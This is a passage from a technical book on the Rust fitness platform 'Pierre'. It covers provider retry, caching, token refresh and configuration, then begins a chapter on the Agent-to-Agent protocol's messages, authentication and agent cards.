impl Default for RetryConfig {
fn default() -> Self {
Self {
max_retries: 3,
base_delay_ms: 100,
max_delay_ms: 5000,
jitter_factor: 0.1,
}
}
}
}
Retry logic:
#![allow(unused)]
fn main() {
async fn fetch_with_retry<T, F, Fut>(
operation: F,
config: &RetryConfig,
) -> Result<T, ProviderError>
where
F: Fn() -> Fut,
Fut: Future<Output = Result<T, ProviderError>>,
{
let mut attempt = 0;
loop {
match operation().await {
Ok(result) => return Ok(result),
Err(e) if e.is_retryable() && attempt < config.max_retries => {
attempt += 1;
let delay = calculate_backoff(attempt, config);
tokio::time::sleep(Duration::from_millis(delay)).await;
}
Err(e) => return Err(e),
}
}
}
fn calculate_backoff(attempt: u32, config: &RetryConfig) -> u64 {
let base = config.base_delay_ms * 2u64.pow(attempt - 1);
let jitter = (base as f64 * config.jitter_factor * rand::random::<f64>()) as u64;
(base + jitter).min(config.max_delay_ms)
}
}
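The doubling-and-cap behavior of `calculate_backoff` can be checked deterministically if the random jitter term is factored out as a parameter. This sketch restates the same arithmetic without the rand dependency; `backoff_ms` is a name invented for the sketch:

```rust
/// Deterministic core of exponential backoff: base * 2^(attempt - 1),
/// plus a caller-supplied jitter, clamped to max_delay_ms. Saturating
/// arithmetic prevents overflow for large attempt counts.
fn backoff_ms(attempt: u32, base_delay_ms: u64, max_delay_ms: u64, jitter_ms: u64) -> u64 {
    let exp = base_delay_ms.saturating_mul(2u64.saturating_pow(attempt.saturating_sub(1)));
    exp.saturating_add(jitter_ms).min(max_delay_ms)
}
```

With the default config (base 100 ms, cap 5000 ms) the sequence is 100, 200, 400, 800, ... until the cap.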
Rate Limit Respect
Providers return Retry-After headers when rate limited:
#![allow(unused)]
fn main() {
match provider.get_activities().await {
Err(ProviderError::RateLimitExceeded { retry_after_secs, .. }) => {
tracing::warn!(
provider = %provider.name(),
retry_after = retry_after_secs,
"Provider rate limited, scheduling retry"
);
// Queue for later execution
scheduler.schedule_retry(request, retry_after_secs).await;
Ok(PendingResult::Scheduled)
}
result => result,
}
}
Token Auto-Refresh
OAuth tokens are automatically refreshed before expiration:
Source: src/oauth2_client/flow_manager.rs (conceptual)
#![allow(unused)]
fn main() {
/// Check if token needs refresh (5 minute buffer)
fn needs_refresh(token: &UserOAuthToken) -> bool {
if let Some(expires_at) = token.expires_at {
let refresh_buffer = chrono::Duration::seconds(300); // 5 minutes
expires_at - refresh_buffer < Utc::now()
} else {
false
}
}
/// Transparently refresh token before provider call
async fn ensure_valid_token(
db: &Database,
user_id: Uuid,
tenant_id: &str,
provider: &str,
) -> Result<String, ProviderError> {
let token = db.oauth_tokens().get(user_id, tenant_id, provider).await?;
if needs_refresh(&token) {
let refreshed = refresh_token(&token).await?;
db.oauth_tokens().upsert(&refreshed).await?;
Ok(refreshed.access_token)
} else {
Ok(token.access_token)
}
}
}
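The buffer arithmetic in `needs_refresh` is easy to verify in isolation. This sketch uses plain unix-second timestamps instead of chrono's `DateTime<Utc>`:

```rust
/// Sketch of the 5-minute refresh buffer on plain unix-second timestamps:
/// refresh when the token expires within the buffer window.
fn needs_refresh(expires_at_unix: Option<i64>, now_unix: i64) -> bool {
    const REFRESH_BUFFER_SECS: i64 = 300; // 5 minutes
    match expires_at_unix {
        Some(exp) => exp - REFRESH_BUFFER_SECS < now_unix,
        None => false, // tokens without an expiry are never proactively refreshed
    }
}
```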
Graceful Degradation
When a provider is unavailable, Pierre continues serving from cache:
#![allow(unused)]
fn main() {
/// Fetch activities with cache fallback
async fn get_activities_resilient(
provider: &dyn FitnessProvider,
cache: &Cache,
user_id: Uuid,
) -> Result<Vec<Activity>, ProviderError> {
let cache_key = format!("activities:{}:{}", provider.name(), user_id);
match provider.get_activities(user_id).await {
Ok(activities) => {
// Update cache on success
cache.set(&cache_key, &activities, Duration::from_secs(3600)).await;
Ok(activities)
}
Err(e) if e.is_transient() => {
// Try cache on transient errors
if let Some(cached) = cache.get::<Vec<Activity>>(&cache_key).await {
tracing::warn!(
provider = %provider.name(),
error = %e,
"Provider unavailable, serving from cache"
);
Ok(cached)
} else {
Err(e)
}
}
Err(e) => Err(e),
}
}
}
Provider Health Checks
Monitor provider availability proactively:
#![allow(unused)]
fn main() {
/// Provider health status
#[derive(Debug, Clone)]
pub struct ProviderHealth {
pub provider: String,
pub is_healthy: bool,
pub last_check: DateTime<Utc>,
pub consecutive_failures: u32,
pub average_latency_ms: f64,
}
/// Check provider health via lightweight endpoint
async fn check_provider_health(provider: &dyn FitnessProvider) -> ProviderHealth {
let start = Instant::now();
let result = provider.health_check().await;
let latency = start.elapsed().as_millis() as f64;
ProviderHealth {
provider: provider.name().to_string(),
is_healthy: result.is_ok(),
last_check: Utc::now(),
consecutive_failures: if result.is_ok() { 0 } else { 1 },
average_latency_ms: latency,
}
}
}
Multi-Provider Fallback
When primary provider fails, try alternatives:
#![allow(unused)]
fn main() {
/// Try multiple providers in order
async fn get_activities_multi_provider(
registry: &ProviderRegistry,
user_id: Uuid,
preferred_providers: &[&str],
) -> Result<Vec<Activity>, ProviderError> {
let mut last_error = None;
for provider_name in preferred_providers {
if let Some(provider) = registry.get(provider_name) {
match provider.get_activities(user_id).await {
Ok(activities) => return Ok(activities),
Err(e) => {
tracing::warn!(
provider = provider_name,
error = %e,
"Provider failed, trying next"
);
last_error = Some(e);
}
}
}
}
Err(last_error.unwrap_or_else(|| ProviderError::NoProvidersAvailable))
}
}
Resilience Configuration
Per-provider resilience settings:
# config/providers.toml (conceptual)
[strava]
max_retries = 3
base_delay_ms = 100
timeout_secs = 30
circuit_breaker_threshold = 5
circuit_breaker_reset_secs = 60
[garmin]
max_retries = 5 # Garmin is slower, more retries
base_delay_ms = 200
timeout_secs = 60
Caching Provider Decorator
Pierre provides a CachingFitnessProvider decorator that wraps any FitnessProvider with transparent caching using the cache-aside pattern. This significantly reduces API calls to external providers.
Cache-Aside Pattern
Source: src/providers/caching_provider.rs
#![allow(unused)]
fn main() {
/// Caching wrapper for any FitnessProvider implementation
pub struct CachingFitnessProvider<C: CacheProvider> {
/// The underlying provider being wrapped
inner: Box<dyn FitnessProvider>,
/// Cache backend (Redis or in-memory)
cache: Arc<C>,
/// Tenant ID for cache key isolation
tenant_id: Uuid,
/// User ID for cache key isolation
user_id: Uuid,
/// TTL configuration for different resource types
ttl_config: CacheTtlConfig,
}
}
How it works:
- Check cache for requested data
- If cache hit: return cached data immediately
- If cache miss: fetch from provider API, store in cache, return data
#![allow(unused)]
fn main() {
// Create a caching provider
let cached_provider = CachingFitnessProvider::new(
provider, // Any Box<dyn FitnessProvider>
cache, // InMemoryCache or RedisCache
tenant_id,
user_id,
);
// Use normally - caching is transparent
let activities = cached_provider.get_activities(Some(10), None).await?;
}
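The cache-aside flow itself can be shown in a few synchronous lines, with a HashMap standing in for the cache backend. This is a sketch (no TTLs, no async); `get_or_fetch` is a name invented here:

```rust
use std::collections::HashMap;

/// Cache-aside in miniature: consult the map first; on a miss, call `fetch`,
/// store the result, and return it.
fn get_or_fetch(
    cache: &mut HashMap<String, String>,
    key: &str,
    fetch: impl FnOnce() -> String,
) -> String {
    if let Some(hit) = cache.get(key) {
        return hit.clone(); // cache hit: no provider call
    }
    let value = fetch(); // cache miss: hit the provider API
    cache.insert(key.to_owned(), value.clone());
    value
}
```

The decorator applies exactly this pattern around each `FitnessProvider` method, with the TTLs and key scheme described below.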
Cache Policy Control
The CachePolicy enum allows explicit control over caching behavior:
Source: src/providers/caching_provider.rs
#![allow(unused)]
fn main() {
/// Cache policy for controlling caching behavior per-request
pub enum CachePolicy {
/// Use cache if available, fetch and cache on miss (default)
UseCache,
/// Bypass cache entirely, always fetch fresh data
Bypass,
/// Invalidate existing cache entry, fetch fresh, update cache
Refresh,
}
}
Usage:
#![allow(unused)]
fn main() {
// Default behavior - use cache
let activities = cached_provider.get_activities(Some(10), None).await?;
// Force fresh data (user-triggered refresh)
let fresh = cached_provider
.get_activities_with_policy(Some(10), None, CachePolicy::Refresh)
.await?;
// Bypass cache entirely (debugging)
let uncached = cached_provider
.get_activities_with_policy(Some(10), None, CachePolicy::Bypass)
.await?;
}
TTL Configuration
Different resources have different cache durations based on data volatility:
| Resource | TTL | Rationale |
|---|---|---|
| AthleteProfile | 24 hours | Profiles rarely change |
| ActivityList | 15 minutes | Need fresh data for new activities |
| Activity | 1 hour | Activity details immutable after creation |
| Stats | 6 hours | Aggregates don't need real-time freshness |
Source: src/constants/cache.rs
#![allow(unused)]
fn main() {
pub const DEFAULT_PROFILE_TTL_SECS: u64 = 86_400; // 24 hours
pub const DEFAULT_ACTIVITY_LIST_TTL_SECS: u64 = 900; // 15 minutes
pub const DEFAULT_ACTIVITY_TTL_SECS: u64 = 3_600; // 1 hour
pub const DEFAULT_STATS_TTL_SECS: u64 = 21_600; // 6 hours
}
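Wiring those constants to resource types might look like the following sketch. `ResourceType` and `default_ttl_secs` are illustrative names, not the actual `CacheTtlConfig` API; only the TTL values come from the constants above.

```rust
/// Illustrative resource kinds mirroring the TTL table
/// (hypothetical names; the real crate uses a CacheTtlConfig struct).
pub enum ResourceType {
    AthleteProfile,
    ActivityList,
    Activity,
    Stats,
}

/// Map each resource type to its documented default TTL in seconds.
pub fn default_ttl_secs(resource: &ResourceType) -> u64 {
    match resource {
        ResourceType::AthleteProfile => 86_400, // 24 hours
        ResourceType::ActivityList => 900,      // 15 minutes
        ResourceType::Activity => 3_600,        // 1 hour
        ResourceType::Stats => 21_600,          // 6 hours
    }
}

fn main() {
    assert_eq!(default_ttl_secs(&ResourceType::ActivityList), 900);
}
```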
Cache Key Structure
Cache keys include tenant/user/provider isolation for multi-tenant safety:
tenant:{tenant_id}:user:{user_id}:provider:{provider}:{resource_type}
Examples:
tenant:abc123:user:def456:provider:strava:athlete_profile
tenant:abc123:user:def456:provider:strava:activity_list:page:1:per_page:50
tenant:abc123:user:def456:provider:strava:activity:12345678
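A helper producing that layout could look like this sketch (`cache_key` is a hypothetical name; the real key builder lives inside the caching provider):

```rust
/// Build a tenant/user/provider-scoped cache key following the documented
/// layout. (Hypothetical helper for illustration.)
fn cache_key(tenant_id: &str, user_id: &str, provider: &str, resource: &str) -> String {
    format!("tenant:{tenant_id}:user:{user_id}:provider:{provider}:{resource}")
}

fn main() {
    let key = cache_key("abc123", "def456", "strava", "athlete_profile");
    assert_eq!(key, "tenant:abc123:user:def456:provider:strava:athlete_profile");
}
```

Because the tenant and user IDs lead the key, invalidating everything for one user reduces to deleting keys under a single prefix.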
Cache Invalidation
Automatic invalidation on disconnect:
#![allow(unused)]
fn main() {
// When user disconnects, cache is automatically cleared
impl<C: CacheProvider> FitnessProvider for CachingFitnessProvider<C> {
async fn disconnect(&self) -> AppResult<()> {
// Invalidate all user's cache entries
self.invalidate_user_cache().await?;
self.inner.disconnect().await
}
}
}
Manual invalidation (for webhooks):
#![allow(unused)]
fn main() {
// Invalidate when new activity detected via webhook
cached_provider.invalidate_activity_list_cache().await?;
// Invalidate all user cache
cached_provider.invalidate_user_cache().await?;
}
Factory Methods
Using the registry:
#![allow(unused)]
fn main() {
// Create a caching provider via registry
let cached_provider = registry
.create_caching_provider("strava", cache_config, tenant_id, user_id)
.await?;
// Or use the global convenience function
let cached_provider = create_caching_provider_global(
"strava",
cache_config,
tenant_id,
user_id,
).await?;
}
Cache Backend Selection
The caching provider supports both in-memory and Redis backends:
# Use Redis (production/multi-instance)
export REDIS_URL=redis://localhost:6379
# No REDIS_URL = use in-memory LRU cache (dev/single-instance)
Benefits of caching:
- Reduced API calls: Bounded by TTL, not request volume
- Faster responses: Sub-millisecond cache hits vs 100ms+ API calls
- Rate limit protection: Fewer calls = less risk of hitting limits
- Resilience: Cache can serve stale data during provider outages
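The "bounded by TTL" claim can be made concrete with a little arithmetic: for one cached key, upstream fetches per day are at most ⌈86 400 / ttl⌉, regardless of how many requests hit the cache. A sketch (`max_daily_fetches` is a hypothetical helper):

```rust
/// Upper bound on upstream API calls per day for a single cached key:
/// ceil(seconds_per_day / ttl_secs), independent of request volume.
fn max_daily_fetches(ttl_secs: u64) -> u64 {
    (86_400 + ttl_secs - 1) / ttl_secs
}

fn main() {
    assert_eq!(max_daily_fetches(900), 96);   // 15-minute TTL: at most 96 fetches/day
    assert_eq!(max_daily_fetches(86_400), 1); // 24-hour TTL: at most 1 fetch/day
}
```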
Configuration Best Practices
Cloud deployment (.envrc for GCP/AWS):
# Production: Configure only active providers
export PIERRE_DEFAULT_PROVIDER=strava
export PIERRE_STRAVA_CLIENT_ID=${STRAVA_CLIENT_ID}
export PIERRE_STRAVA_CLIENT_SECRET=${STRAVA_CLIENT_SECRET}
# Multi-provider setup
export PIERRE_DEFAULT_PROVIDER=strava
export PIERRE_STRAVA_CLIENT_ID=${STRAVA_CLIENT_ID}
export PIERRE_STRAVA_CLIENT_SECRET=${STRAVA_CLIENT_SECRET}
export PIERRE_GARMIN_CLIENT_ID=${GARMIN_CONSUMER_KEY}
export PIERRE_GARMIN_CLIENT_SECRET=${GARMIN_CONSUMER_SECRET}
export PIERRE_FITBIT_CLIENT_ID=${FITBIT_CLIENT_ID}
export PIERRE_FITBIT_CLIENT_SECRET=${FITBIT_CLIENT_SECRET}
# Development: Use synthetic provider (no secrets!)
export PIERRE_DEFAULT_PROVIDER=synthetic
# No other vars needed - synthetic provider works out of the box
Testing environments:
# Integration tests: Use synthetic provider
export PIERRE_DEFAULT_PROVIDER=synthetic
# OAuth tests: Override to real provider
export PIERRE_DEFAULT_PROVIDER=strava
export PIERRE_STRAVA_CLIENT_ID=test-client-id
export PIERRE_STRAVA_CLIENT_SECRET=test-secret
Key Takeaways
- Pluggable architecture: Providers are registered at runtime through the factory pattern, with no compile-time coupling.
- Feature flags: Compile-time provider selection via provider-strava, provider-garmin, and provider-synthetic for minimal binaries.
- Service Provider Interface (SPI): The ProviderDescriptor trait enables external providers to register without core code changes.
- Bitflags capabilities: ProviderCapabilities uses efficient bitflags with combinators like activity_only() and full_health().
- One to many providers: The system supports any number of providers simultaneously - just Strava, or Strava + Garmin + custom providers.
- Dynamic discovery: supported_providers() and is_supported() enable runtime introspection and automatic tool adaptation.
- Environment-based config: Cloud-native deployment using PIERRE_<PROVIDER>_* environment variables.
- Synthetic provider: An OAuth-free development provider perfect for CI/CD, demos, and rapid iteration.
- OAuth parameters: The OAuthParams struct captures provider-specific OAuth differences (scope separator, PKCE).
- Factory pattern: The ProviderFactory trait enables lazy provider instantiation with configuration injection.
- Shared interface: The FitnessProvider trait ensures uniform request/response patterns across all providers.
- Trait objects: Box<dyn ProviderFactory> enables storing heterogeneous factory types in the registry.
- Interior mutability: The Arc<RwLock<T>> pattern allows mutation through &self in async trait methods.
- Zero code changes: Adding providers doesn’t require modifying connection handlers, tools, or application logic.
- Type safety: The compiler enforces that all providers implement the complete FitnessProvider interface.
- Caching decorator: CachingFitnessProvider wraps any provider with transparent cache-aside caching to reduce API calls.
- Cache policy control: The CachePolicy enum (UseCache, Bypass, Refresh) enables per-request cache behavior control.
- Multi-tenant cache isolation: Cache keys include tenant, user, and provider for safe multi-tenant deployments.
Next Chapter: Chapter 18: A2A Protocol - Agent-to-Agent Communication - Learn how Pierre implements the Agent-to-Agent (A2A) protocol for secure inter-agent communication with Ed25519 signatures.
Previous Chapter: Chapter 17: Provider Data Models & Rate Limiting - Explore trait-based provider abstraction, unified data models, and retry logic with exponential backoff.
Chapter 18: A2A Protocol - Agent-to-Agent Communication
This chapter explores how Pierre implements the Agent-to-Agent (A2A) protocol for secure inter-agent communication. You’ll learn about the A2A protocol architecture, Ed25519 signatures, agent capability discovery, and JSON-RPC-based messaging between AI agents.
A2A Protocol Overview
A2A (Agent-to-Agent) protocol enables AI agents to communicate and collaborate:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Agent A │ │ Pierre │ │ Agent B │
│ (Claude) │ │ A2A Server │ │ (Other AI) │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ 1. Get Agent Card │ │
├────────────────────────────────►│ │
│ (discover capabilities) │ │
│ │ │
│ 2. Register A2A Client │ │
│ (with Ed25519 public key) │ │
├────────────────────────────────►│ │
│ │ │
│ 3. Initialize session │ │
│ (negotiate protocol version) │ │
├────────────────────────────────►│ │
│ │ │
│ 4. Send message │ │
│ (with Ed25519 signature) │ │
├────────────────────────────────►│ │
│ │ 5. Forward message │
│ ├────────────────────────────────►│
│ │ │
│ 6. Stream response │ │
│◄────────────────────────────────┤ │
A2A use cases:
- Multi-agent workflows: Claude orchestrates Pierre for fitness analysis
- Task delegation: Long-running analytics tasks with progress updates
- Capability discovery: Agents learn what other agents can do
- Secure messaging: Ed25519 signatures prevent message tampering
JSON-RPC 2.0 Foundation
A2A protocol uses JSON-RPC 2.0 for all communication:
Source: src/a2a/protocol.rs:23-28
#![allow(unused)]
fn main() {
// Phase 2: Type aliases pointing to unified JSON-RPC foundation
/// A2A protocol request (JSON-RPC 2.0 request)
pub type A2ARequest = crate::jsonrpc::JsonRpcRequest;
/// A2A protocol response (JSON-RPC 2.0 response)
pub type A2AResponse = crate::jsonrpc::JsonRpcResponse;
}
Design choice: A2A reuses the same JSON-RPC infrastructure as MCP (Chapter 9), ensuring consistency and reducing code duplication.
A2A Error Types
A2A defines protocol-specific errors mapped to JSON-RPC error codes:
Source: src/a2a/protocol.rs:31-69
#![allow(unused)]
fn main() {
/// A2A Protocol Error types
#[derive(Debug, Clone, Serialize, Deserialize, thiserror::Error)]
pub enum A2AError {
/// Invalid request parameters or format
#[error("Invalid request: {0}")]
InvalidRequest(String),
/// Authentication failed
#[error("Authentication failed: {0}")]
AuthenticationFailed(String),
/// Client not registered
#[error("Client not registered: {0}")]
ClientNotRegistered(String),
/// Database operation failed
#[error("Database error: {0}")]
DatabaseError(String),
/// Client has been deactivated
#[error("Client deactivated: {0}")]
ClientDeactivated(String),
/// Rate limit exceeded
#[error("Rate limit exceeded: {0}")]
RateLimitExceeded(String),
/// Session expired or invalid
#[error("Session expired: {0}")]
SessionExpired(String),
/// Insufficient permissions
#[error("Insufficient permissions: {0}")]
InsufficientPermissions(String),
// ... more error types
}
}
Error code mapping:
Source: src/a2a/protocol.rs:76-95
#![allow(unused)]
fn main() {
impl From<A2AError> for A2AErrorResponse {
fn from(error: A2AError) -> Self {
let (code, message) = match error {
A2AError::InvalidRequest(msg) => (-32602, format!("Invalid params: {msg}")),
A2AError::AuthenticationFailed(msg) => {
(-32001, format!("Authentication failed: {msg}"))
}
A2AError::ClientNotRegistered(msg) => (-32003, format!("Client not registered: {msg}")),
A2AError::RateLimitExceeded(msg) => (-32005, format!("Rate limit exceeded: {msg}")),
A2AError::SessionExpired(msg) => (-32006, format!("Session expired: {msg}")),
A2AError::InsufficientPermissions(msg) => {
(-32008, format!("Insufficient permissions: {msg}"))
}
// ... more error mappings
};
Self {
code,
message,
data: None,
}
}
}
}
Error code ranges:
- -32600 to -32699: JSON-RPC reserved codes
- -32000 to -32099: Server-defined errors
- -32001 to -32010: A2A-specific error codes
A2A Client Structure
A2A clients have identities, public keys, and capabilities:
Source: src/a2a/auth.rs:34-68
#![allow(unused)]
fn main() {
/// A2A Client registration information
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2AClient {
/// Unique client identifier
pub id: String,
/// User ID for session tracking and consistency
pub user_id: uuid::Uuid,
/// Human-readable client name
pub name: String,
/// Description of the client application
pub description: String,
/// Public key for signature verification
pub public_key: String,
/// List of capabilities this client can access
pub capabilities: Vec<String>,
/// Allowed OAuth redirect URIs
pub redirect_uris: Vec<String>,
/// Whether this client is active
pub is_active: bool,
/// When this client was created
pub created_at: chrono::DateTime<chrono::Utc>,
/// List of permissions granted to this client
#[serde(default = "default_permissions")]
pub permissions: Vec<String>,
/// Maximum requests allowed per window
#[serde(default = "default_rate_limit_requests")]
pub rate_limit_requests: u32,
/// Rate limit window duration in seconds
#[serde(default = "default_rate_limit_window")]
pub rate_limit_window_seconds: u32,
}
}
Key fields:
- public_key: Ed25519 public key for signature verification
- permissions: Granted access (e.g., read_activities, write_goals)
- rate_limit_requests: Max requests per time window
- is_active: Admin can deactivate misbehaving clients
A2A Initialization Flow
Agents initialize sessions with protocol negotiation:
Source: src/a2a/protocol.rs:105-123
#![allow(unused)]
fn main() {
/// A2A Initialize Request structure
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2AInitializeRequest {
/// A2A protocol version
#[serde(rename = "protocolVersion")]
pub protocol_version: String,
/// Client information
#[serde(rename = "clientInfo")]
pub client_info: A2AClientInfo,
/// Client capabilities
pub capabilities: Vec<String>,
/// Optional OAuth application credentials provided by the client
#[serde(
rename = "oauthCredentials",
default,
skip_serializing_if = "Option::is_none"
)]
pub oauth_credentials: Option<HashMap<String, crate::mcp::schema::OAuthAppCredentials>>,
}
}
Initialization request (JSON):
{
"jsonrpc": "2.0",
"method": "initialize",
"params": {
"protocolVersion": "2025-11-15",
"clientInfo": {
"name": "Claude Agent",
"version": "1.0.0"
},
"capabilities": [
"message/send",
"message/stream",
"tasks/create"
]
},
"id": 1
}
Initialization response:
Source: src/a2a/protocol.rs:162-187
#![allow(unused)]
fn main() {
impl A2AInitializeResponse {
/// Create a new A2A initialize response with server information
#[must_use]
pub fn new(protocol_version: String, server_name: String, server_version: String) -> Self {
Self {
protocol_version,
server_info: A2AServerInfo {
name: server_name,
version: server_version,
description: Some(
"AI-powered fitness data analysis and insights platform".to_owned(),
),
},
capabilities: vec![
"message/send".to_owned(),
"message/stream".to_owned(),
"tasks/create".to_owned(),
"tasks/get".to_owned(),
"tasks/cancel".to_owned(),
"tasks/pushNotificationConfig/set".to_owned(),
"tools/list".to_owned(),
"tools/call".to_owned(),
],
}
}
}
}
Capability negotiation: Server returns intersection of client-requested and server-supported capabilities.
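That intersection rule can be sketched in a few lines (`negotiate` is a hypothetical helper, not the actual server code):

```rust
/// Keep only the capabilities both client and server support
/// (sketch of the negotiation rule described above).
fn negotiate(client: &[&str], server: &[&str]) -> Vec<String> {
    client
        .iter()
        .copied()
        .filter(|cap| server.contains(cap))
        .map(str::to_owned)
        .collect()
}

fn main() {
    let client = ["message/send", "tasks/create", "custom/experimental"];
    let server = ["message/send", "message/stream", "tasks/create", "tools/list"];
    let agreed = negotiate(&client, &server);
    assert_eq!(agreed, vec!["message/send", "tasks/create"]);
}
```

Capabilities the client requests but the server doesn’t offer (like the hypothetical `custom/experimental` above) are simply dropped from the agreed set.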
A2A Message Structure
Messages support text, structured data, and file attachments:
Source: src/a2a/protocol.rs:189-227
#![allow(unused)]
fn main() {
/// A2A Message structure for agent communication
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2AMessage {
/// Unique message identifier
pub id: String,
/// Message content parts (text, data, or files)
pub parts: Vec<MessagePart>,
/// Optional metadata key-value pairs
#[serde(skip_serializing_if = "Option::is_none")]
pub metadata: Option<HashMap<String, Value>>,
}
/// A2A Message Part types
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type")]
pub enum MessagePart {
/// Plain text message content
#[serde(rename = "text")]
Text {
/// Text content
content: String,
},
/// Structured data content (JSON)
#[serde(rename = "data")]
Data {
/// Data content as JSON value
content: Value,
},
/// File attachment content
#[serde(rename = "file")]
File {
/// File name
name: String,
/// MIME type of the file
mime_type: String,
/// File content (base64 encoded)
content: String,
},
}
}
Example message (JSON):
{
"id": "msg_abc123",
"parts": [
{
"type": "text",
"content": "Analyzing your recent running activities..."
},
{
"type": "data",
"content": {
"activities_analyzed": 10,
"average_pace": "5:30/km",
"trend": "improving"
}
}
],
"metadata": {
"agent": "Pierre",
"timestamp": "2025-11-15T10:00:00Z"
}
}
A2A Authentication
A2A supports API key authentication with rate limiting:
Source: src/a2a/auth.rs:95-113
#![allow(unused)]
fn main() {
/// Authenticate an A2A request using API key
///
/// # Errors
///
/// Returns an error if:
/// - The API key format is invalid
/// - Authentication fails
/// - Rate limits are exceeded
pub async fn authenticate_api_key(&self, api_key: &str) -> AppResult<AuthResult> {
// Check if it's an A2A-specific API key (with a2a_ prefix)
if api_key.starts_with("a2a_") {
return self.authenticate_a2a_key(api_key).await;
}
// Use standard API key authentication through MCP middleware
let middleware = &self.resources.auth_middleware;
middleware.authenticate_request(Some(api_key)).await
}
}
A2A-specific authentication:
Source: src/a2a/auth.rs:116-181
#![allow(unused)]
fn main() {
/// Authenticate A2A-specific API key with rate limiting
async fn authenticate_a2a_key(&self, api_key: &str) -> AppResult<AuthResult> {
// Extract key components (similar to API key validation)
if !api_key.starts_with("a2a_") || api_key.len() < 16 {
return Err(AppError::auth_invalid("Invalid A2A API key format").into());
}
let middleware = &self.resources.auth_middleware;
// First authenticate using regular API key system
let mut auth_result = middleware.authenticate_request(Some(api_key)).await?;
// Add A2A-specific rate limiting
if let AuthMethod::ApiKey { key_id, tier: _ } = &auth_result.auth_method {
// Find A2A client associated with this API key
if let Some(client) = self.get_a2a_client_by_api_key(key_id).await? {
let client_manager = &*self.resources.a2a_client_manager;
// Check A2A-specific rate limits
let rate_limit_status = client_manager
.get_client_rate_limit_status(&client.id)
.await?;
if rate_limit_status.is_rate_limited {
return Err(ProviderError::RateLimitExceeded {
provider: "A2A Client Authentication".to_owned(),
retry_after_secs: /* calculate from reset_at */,
limit_type: format!(
"A2A client rate limit exceeded. Limit: {}, Reset at: {}",
rate_limit_status.limit.unwrap_or(0),
rate_limit_status.reset_at.map_or_else(|| "unknown".into(), |dt| dt.to_rfc3339())
),
}
.into());
}
// Update auth method to indicate A2A authentication
auth_result.auth_method = AuthMethod::ApiKey {
key_id: key_id.clone(),
tier: format!("A2A-{}", rate_limit_status.tier.display_name()),
};
}
}
Ok(auth_result)
}
}
Rate limiting flow:
- Validate API key format: Must start with a2a_ and meet a minimum length
- Lookup A2A client: Find client associated with API key
- Check rate limits: Enforce A2A-specific rate limits
- Return auth result: Include rate limit status in response
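A minimal fixed-window limiter matching the rate_limit_requests / rate_limit_window_seconds fields on A2AClient might look like this sketch (`FixedWindowLimiter` is a hypothetical std-only type; the real logic lives in the A2A client manager):

```rust
use std::time::{Duration, Instant};

/// Std-only fixed-window rate limiter sketch (hypothetical type).
pub struct FixedWindowLimiter {
    limit: u32,
    window: Duration,
    window_start: Instant,
    count: u32,
}

impl FixedWindowLimiter {
    pub fn new(limit: u32, window: Duration) -> Self {
        Self { limit, window, window_start: Instant::now(), count: 0 }
    }

    /// Returns true if the request is allowed in the current window.
    pub fn try_acquire(&mut self) -> bool {
        // Start a new window once the old one has elapsed
        if self.window_start.elapsed() >= self.window {
            self.window_start = Instant::now();
            self.count = 0;
        }
        if self.count < self.limit {
            self.count += 1;
            true
        } else {
            false
        }
    }
}

fn main() {
    let mut limiter = FixedWindowLimiter::new(2, Duration::from_secs(60));
    assert!(limiter.try_acquire());
    assert!(limiter.try_acquire());
    assert!(!limiter.try_acquire()); // third request in the window is rejected
}
```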
Agent Capability Discovery
Agents advertise capabilities through agent cards:
Source: src/a2a/agent_card.rs:16-34
#![allow(unused)]
fn main() {
/// A2A Agent Card for Pierre
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AgentCard {
/// Agent name ("Pierre Fitness AI")
pub name: String,
/// Human-readable description of the agent's capabilities
pub description: String,
/// Agent version number
pub version: String,
/// List of high-level capabilities (e.g., "fitness-data-analysis")
pub capabilities: Vec<String>,
/// Authentication methods supported
pub authentication: AuthenticationInfo,
/// Available tools/endpoints with schemas
pub tools: Vec<ToolDefinition>,
/// Optional additional metadata
#[serde(skip_serializing_if = "Option::is_none")]
pub metadata: Option<HashMap<String, Value>>,
}
}
Agent card example (Pierre):
Source: src/a2a/agent_card.rs:98-135
#![allow(unused)]
fn main() {
impl AgentCard {
/// Create a new Agent Card for Pierre
#[must_use]
pub fn new() -> Self {
Self {
name: "Pierre Fitness AI".into(),
description: "AI-powered fitness data analysis and insights platform providing comprehensive activity analysis, performance tracking, and intelligent recommendations for athletes and fitness enthusiasts.".into(),
version: "1.0.0".into(),
capabilities: vec![
"fitness-data-analysis".into(),
"activity-intelligence".into(),
"goal-management".into(),
"performance-prediction".into(),
"training-analytics".into(),
"provider-integration".into(),
],
authentication: AuthenticationInfo {
schemes: vec!["api-key".into(), "oauth2".into()],
oauth2: Some(OAuth2Info {
authorization_url: "https://pierre.ai/oauth/authorize".into(),
token_url: "https://pierre.ai/oauth/token".into(),
scopes: vec![
"fitness:read".into(),
"analytics:read".into(),
"goals:read".into(),
"goals:write".into(),
],
}),
api_key: Some(ApiKeyInfo {
header_name: "Authorization".into(),
prefix: Some("Bearer".into()),
registration_url: "https://pierre.ai/api/keys/request".into(),
}),
},
tools: Self::create_tool_definitions(),
metadata: Some(Self::create_metadata()),
}
}
}
}
Tool definition in agent card:
Source: src/a2a/agent_card.rs:140-200
#![allow(unused)]
fn main() {
ToolDefinition {
name: "get_activities".into(),
description: "Retrieve user fitness activities from connected providers".to_owned(),
input_schema: serde_json::json!({
"type": "object",
"properties": {
"limit": {
"type": "number",
"description": "Number of activities to retrieve (max 100)",
"minimum": 1,
"maximum": 100,
"default": 10
},
"before": {
"type": "string",
"format": "date-time",
"description": "ISO 8601 date to get activities before"
},
"provider": {
"type": "string",
"enum": ["strava", "fitbit"],
"description": "Specific provider to query (optional)"
}
}
}),
output_schema: serde_json::json!({
"type": "object",
"properties": {
"activities": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {"type": "string"},
"name": {"type": "string"},
"sport_type": {"type": "string"},
"start_date": {"type": "string", "format": "date-time"},
"duration_seconds": {"type": "number"},
"distance_meters": {"type": "number"},
"elevation_gain": {"type": "number"}
}
}
},
"total_count": {"type": "number"}
}
}),
examples: Some(vec![ToolExample {
description: "Get recent activities".into(),
input: serde_json::json!({"limit": 5}),
output: serde_json::json!({/* example output */}),
}]),
}
}
Agent card benefits:
